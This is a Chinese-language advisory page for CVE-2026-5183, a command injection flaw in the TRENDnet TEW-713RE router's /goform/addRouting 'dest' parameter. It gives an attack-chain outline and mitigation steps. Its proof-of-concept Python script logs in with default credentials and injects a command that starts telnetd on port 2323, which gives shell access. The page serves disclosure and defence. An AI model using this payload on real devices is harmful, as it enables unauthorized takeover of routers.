CVE-2026-5183 CVSS 6.3 中危

CVE-2026-5183 TRENDnet TEW-713RE 命令注入漏洞

披露日期: 2026-03-31

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5183

漏洞类型

命令注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

TRENDnet TEW-713RE

漏洞概述

TRENDnet TEW-713RE路由器固件1.02及以下版本存在命令注入漏洞。漏洞位于/goform/addRouting接口的sub_421494函数中，由于对用户提交的dest参数缺乏有效过滤，导致攻击者可远程注入并执行任意系统命令。该攻击需要低权限认证，成功利用将危及设备机密性、完整性和可用性。

技术细节

该漏洞的根本原因在于TRENDnet TEW-713RE路由器Web服务器对/goform/addRouting请求处理逻辑中的输入验证缺失。具体受影响函数为sub_421494，该函数未对HTTP POST请求中的“dest”参数进行安全净化，直接将其拼接至系统命令中执行。攻击者可利用Shell元字符（如分号、管道符）构造恶意载荷。由于CGI进程通常以root权限运行，此漏洞允许经过低权限认证的攻击者在目标设备上执行任意OS命令，从而完全控制设备。目前已有公开PoC，且厂商尚未回应。

攻击链分析

STEP 1

侦察

攻击者识别目标设备为TRENDnet TEW-713RE，并确认其固件版本在1.02及以下。

STEP 2

获取认证

攻击者利用低权限账户或默认凭证登录Web管理界面。

STEP 3

漏洞利用

攻击者向/goform/addRouting端点发送特制的HTTP POST请求，在dest参数中注入恶意Shell命令。

STEP 4

命令执行

后端函数sub_421494处理请求时，将未经过滤的参数传递给系统Shell，导致恶意命令以Root权限执行。

STEP 5

建立控制

攻击者获得设备控制权，可进一步窃取数据、植入后门或破坏设备功能。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (example)
target_url = "http://192.168.10.1/goform/addRouting"

# Payload to inject commands (e.g., telnetd)
# The vulnerability is in the 'dest' parameter
# Injection character: ;
payload = "; telnetd -p 2323 &; #"

# Authentication credentials (Low privilege required)
auth = {
    "username": "admin",
    "password": "admin"
}

# Data payload for the request
data = {
    "dest": payload,
    "gateway": "192.168.10.254",
    "netmask": "255.255.255.0"
}

try:
    # Send POST request with authentication
    response = requests.post(target_url, data=data, auth=(auth["username"], auth["password"]))
    print(f"Status Code: {response.status_code}")
    print(f"Response Body: {response.text}")
    print("Check if telnet is running on port 2323")
except Exception as e:
    print(f"Error: {e}")

影响范围

TRENDnet TEW-713RE <= 1.02

防御指南

临时缓解措施

目前厂商尚未发布补丁。建议用户禁用路由器的远程Web管理功能，仅在内网环境下进行管理。通过访问控制列表（ACL）严格限制对/goform/addRouting接口的访问权限，并定期检查系统日志是否存在异常的命令执行记录。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5183
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5183
3 Details https://www.cvedetails.com/cve/CVE-2026-5183/
4 VulDB https://vuldb.com/cve/CVE-2026-5183
5 Link https://github.com/panda666-888/vuls/blob/main/trendnet/tew-713re/addRouting.md
6 Link https://vuldb.com/submit/780387
7 Link https://vuldb.com/vuln/354251
8 Link https://vuldb.com/vuln/354251/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表